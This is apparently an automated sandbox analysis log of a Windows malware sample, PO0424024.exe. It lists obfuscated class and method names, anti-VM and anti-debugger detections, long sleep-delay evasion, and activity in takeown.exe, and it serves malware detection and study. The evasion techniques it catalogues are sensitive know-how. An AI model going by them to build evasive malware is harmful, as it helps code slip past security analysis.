Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, bA3SS5wJKrXALX79qC.cs	High entropy of concatenated method names: 'KmxJFZfYVQ', 'X3fJRfBKKe', 'ToString', 'RSHJZGvhwF', 'F7HJjoJEyU', 'W1jJDf2mue', 'sF2J5uLaLk', 'qNhJ1XehYo', 'N2WJNuiNfu', 'ta7JbePFKo'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, KGeVZ28UIBVNOkPHmF.cs	High entropy of concatenated method names: 'Dispose', 'kScrnhTsoW', 'r7c6QMPEKn', 'UwoGGkv0vR', 'iE9rPvXNMj', 'QZwrzYTi76', 'ProcessDialogKey', 'Thb6kWZ6qF', 'yoL6rGSrNe', 'zTl66rjInE'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, n1EW1fa7RmuHh2eHM9w.cs	High entropy of concatenated method names: 'TvL8MtbMHQ', 'yUN848Zb32', 'Dsi8iqCRt6', 'OoO8EMcOQF', 'rEg8Hri0ix', 'IoC8O2RKvt', 'god8LmwVUF', 'XHs8fduDbB', 'zLD8uOLi6r', 'fn08xHlIt6'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, YSxpOUA4uyf5JdNj1C.cs	High entropy of concatenated method names: 'su5dScxUtQ', 'GGTdKC7MgQ', 'EaUdtZ3R2m', 'Ubgd3sk4c5', 'xeydQds1Nv', 'yvsdAQhYOe', 'DKJdTAdxXJ', 'OWodp3r7Pu', 'aS8dVVvvwS', 'nxpdqgZo2p'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, m09LbGHvOCXuOlhAVi.cs	High entropy of concatenated method names: 'sJKNZJmK0d', 'OQeNDXBBuX', 'my8N1oRpVo', 'ytc1PynGb0', 'IKD1zVk84N', 'awONkiFIqd', 'e9QNr1H1iI', 'ufrN6ySxA0', 'a8ZNBqcHPR', 'L3ZNsmdppw'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, jaKfEhvVHNriyUHBD5.cs	High entropy of concatenated method names: 'rxt5H1UaLd', 'LyO5LlCpcT', 'eIgDAL5O7a', 'LNmDT5PEpB', 'JX4DpnPCnk', 'da5DVnJwY9', 'pkDDqRjRkD', 'cPtDwnF1Li', 'Wg2DeaGPb6', 'sZjDSZo8v0'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, TdpK7UBYZRso2FLCgU.cs	High entropy of concatenated method names: 'NA0Jhep55i', 'R7OJPSxUU4', 'xTA9ktWs0l', 'Tve9rhE5ky', 'TYRJvVcvBa', 'xssJK2MUFV', 'RkHJmdqH1d', 'HwDJt5ryVF', 'kITJ35k2Hr', 'CpkJCNHtbF'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, HNrGVVaRFHRt9wE1yIH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KLZYtwwt4M', 'HeKY3RLRBI', 'f4oYCik7Re', 'O57YyeoAbG', 'F08Y2et9mM', 'bW2YISPhOY', 'mN9YWUPIwq'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, S4cgTPaaQ63YDrb3WEb.cs	High entropy of concatenated method names: 'ToString', 'gS9YB59Dv5', 'rhWYsi1gWt', 'wrbYXuT0RD', 's65YZc8k3N', 'g4FYjehAW0', 'drPYDht3br', 'uoiY5RMHje', 'qMvIaLpBgSrMUhhO7RD', 'lax7M7pHwCLP2iVxmXH'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, HsvUApVHHAG66pB3Hb.cs	High entropy of concatenated method names: 'qJF1XAxmTd', 'jpw1jFEGJf', 'may158qcJs', 'Ymk1NXTu8E', 'nQT1b88pyg', 'Wgg52DahZv', 'Yv85IOUgFO', 'UJ45WOvcIO', 'nrb5hi1u6r', 'mtn5n9K3Qt'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, LrIAQpqtGcG7NuVqi1.cs	High entropy of concatenated method names: 'O8UbjcKDeOmRuavJwmh', 'eGcJi2KRFnKbpqa8IZW', 'xb6L51KGr7L3PM8U4EB', 'b4Q19KAmrt', 'Heg18qpow3', 'QNF1YWPA4N', 'AQosqHKVuoJsCV9QoJA', 'gb5db3Ki8ZySkkFULu2', 'Jw9B1KKCLC5QN2rFFsH'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, sAO7rj2vMbNiiAhvyA.cs	High entropy of concatenated method names: 'c1hgfds8nC', 'MKpguKMWWa', 'oHLglJ2Y6P', 'T6WgQEdwWT', 'CiJgTQnSq4', 'FhBgpjywx3', 'LHBgqY38CD', 'gOIgwlfFxk', 'ooggSNRUVM', 'SEOgvCPM6N'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, ayiQZall1kUmx0W6Gb.cs	High entropy of concatenated method names: 'aLbie5RHp', 'N8OES2sHA', 'CEOOOpfqR', 'IttLgler6', 'YvkucaUKW', 'JG3xZwAR1', 'MyBFtuwulVybd7tnvi', 'cIVklsm68nhQxSstak', 'UOS9LVkEm', 'TekYCvxpU'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, WNlJvjLnRnZodIGnuR.cs	High entropy of concatenated method names: 'fGd8rtiLps', 'gHH8BX8m4F', 'aUj8sBIVB7', 'sTu8ZBQ8u3', 'f168jucpQ0', 'nVb85ZYpRv', 'X5681sJNoe', 'xCv9WaAWd3', 'zyt9hPl0s0', 'FYv9nTBufc'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, vfniaBJA1eeHlImvxN.cs	High entropy of concatenated method names: 'bT6rNgRsWI', 'lG6rb3vkNa', 'I1urFWsR1v', 'kGcrRHbteM', 'Uv0rdJMnbp', 'pv2r0UlPZ7', 'XnVoVAxRS1V02DuQk0', 'ANXSf0gkvEGrsU2KTN', 'kmGrryfgJQ', 'h8nrBjT1j8'
Source: 0.2.PO0424024.exe.46f0000.9.raw.unpack, tcpnC1NfLeotSQH8gi.cs	High entropy of concatenated method names: 'ToString', 'Rkr0vEW2qG', 'oJx0QGfEt5', 'h6y0AZ2vnP', 'Iaw0TTZmhl', 'cqh0pWN6cX', 'UEd0VSDo04', 'xAD0qtdiHi', 'O5P0wneSme', 'F3H0eoQqIE'

Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO0424024.exe PID: 7072, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 26F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 46F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 7510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 8510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 86C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 96C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: 9C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0424024.exe	Memory allocated: BC40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

Code function: 2_2_00FDD1C0 rdtsc

2_2_00FDD1C0

Source: C:\Users\user\Desktop\PO0424024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe	Window / User API: threadDelayed 5622			Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Window / User API: threadDelayed 4348			Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\takeown.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\PO0424024.exe TID: 1456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe TID: 7164	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe TID: 7164	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe TID: 7164	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe TID: 7164	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe TID: 7164	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 2932	Thread sleep count: 5622 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 2932	Thread sleep time: -11244000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 2932	Thread sleep count: 4348 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 2932	Thread sleep time: -8696000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\takeown.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\takeown.exe

Code function: 7_2_02F1BAC0 FindFirstFileW,FindNextFileW,FindClose,

7_2_02F1BAC0

Source: C:\Users\user\Desktop\PO0424024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: tAFcdstzdUTfkmQlByDmlLl.exe, 00000006.00000002.4170435590.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000007.00000002.4158156382.000000000316E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2458304607.0000024C0EA7C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO0424024.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO0424024.exe

Code function: 2_2_00FDD1C0 rdtsc

2_2_00FDD1C0

Source: C:\Users\user\Desktop\PO0424024.exe

Code function: 2_2_004176B3 LdrLoadDll,

2_2_004176B3

Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5C0F0 mov eax, dword ptr fs:[00000030h]	2_2_00F5C0F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA20F0 mov ecx, dword ptr fs:[00000030h]	2_2_00FA20F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_00F5A0E3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01020115 mov eax, dword ptr fs:[00000030h]	2_2_01020115
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100A118 mov ecx, dword ptr fs:[00000030h]	2_2_0100A118
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100A118 mov eax, dword ptr fs:[00000030h]	2_2_0100A118
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100A118 mov eax, dword ptr fs:[00000030h]	2_2_0100A118
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100A118 mov eax, dword ptr fs:[00000030h]	2_2_0100A118
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F850E4 mov eax, dword ptr fs:[00000030h]	2_2_00F850E4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F850E4 mov ecx, dword ptr fs:[00000030h]	2_2_00F850E4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F680E9 mov eax, dword ptr fs:[00000030h]	2_2_00F680E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE20DE mov eax, dword ptr fs:[00000030h]	2_2_00FE20DE
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F890DB mov eax, dword ptr fs:[00000030h]	2_2_00F890DB
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov ecx, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov ecx, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov ecx, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov ecx, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F770C0 mov eax, dword ptr fs:[00000030h]	2_2_00F770C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDD0C0 mov eax, dword ptr fs:[00000030h]	2_2_00FDD0C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDD0C0 mov eax, dword ptr fs:[00000030h]	2_2_00FDD0C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01035152 mov eax, dword ptr fs:[00000030h]	2_2_01035152
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F65096 mov eax, dword ptr fs:[00000030h]	2_2_00F65096
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9909C mov eax, dword ptr fs:[00000030h]	2_2_00F9909C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8D090 mov eax, dword ptr fs:[00000030h]	2_2_00F8D090
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8D090 mov eax, dword ptr fs:[00000030h]	2_2_00F8D090
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5D08D mov eax, dword ptr fs:[00000030h]	2_2_00F5D08D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6208A mov eax, dword ptr fs:[00000030h]	2_2_00F6208A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov ecx, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F71070 mov eax, dword ptr fs:[00000030h]	2_2_00F71070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101C188 mov eax, dword ptr fs:[00000030h]	2_2_0101C188
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101C188 mov eax, dword ptr fs:[00000030h]	2_2_0101C188
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8C073 mov eax, dword ptr fs:[00000030h]	2_2_00F8C073
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDD070 mov ecx, dword ptr fs:[00000030h]	2_2_00FDD070
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE106E mov eax, dword ptr fs:[00000030h]	2_2_00FE106E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010111A4 mov eax, dword ptr fs:[00000030h]	2_2_010111A4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010111A4 mov eax, dword ptr fs:[00000030h]	2_2_010111A4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010111A4 mov eax, dword ptr fs:[00000030h]	2_2_010111A4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010111A4 mov eax, dword ptr fs:[00000030h]	2_2_010111A4
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F62050 mov eax, dword ptr fs:[00000030h]	2_2_00F62050
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B052 mov eax, dword ptr fs:[00000030h]	2_2_00F8B052
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010261C3 mov eax, dword ptr fs:[00000030h]	2_2_010261C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010261C3 mov eax, dword ptr fs:[00000030h]	2_2_010261C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010351CB mov eax, dword ptr fs:[00000030h]	2_2_010351CB
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5A020 mov eax, dword ptr fs:[00000030h]	2_2_00F5A020
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5C020 mov eax, dword ptr fs:[00000030h]	2_2_00F5C020
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E016 mov eax, dword ptr fs:[00000030h]	2_2_00F7E016
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E016 mov eax, dword ptr fs:[00000030h]	2_2_00F7E016
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E016 mov eax, dword ptr fs:[00000030h]	2_2_00F7E016
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E016 mov eax, dword ptr fs:[00000030h]	2_2_00F7E016
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010361E5 mov eax, dword ptr fs:[00000030h]	2_2_010361E5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F901F8 mov eax, dword ptr fs:[00000030h]	2_2_00F901F8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F851EF mov eax, dword ptr fs:[00000030h]	2_2_00F851EF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F651ED mov eax, dword ptr fs:[00000030h]	2_2_00F651ED
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9D1D0 mov eax, dword ptr fs:[00000030h]	2_2_00F9D1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9D1D0 mov ecx, dword ptr fs:[00000030h]	2_2_00F9D1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]	2_2_00FDE1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]	2_2_00FDE1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_00FDE1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]	2_2_00FDE1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]	2_2_00FDE1D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102903E mov eax, dword ptr fs:[00000030h]	2_2_0102903E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102903E mov eax, dword ptr fs:[00000030h]	2_2_0102903E
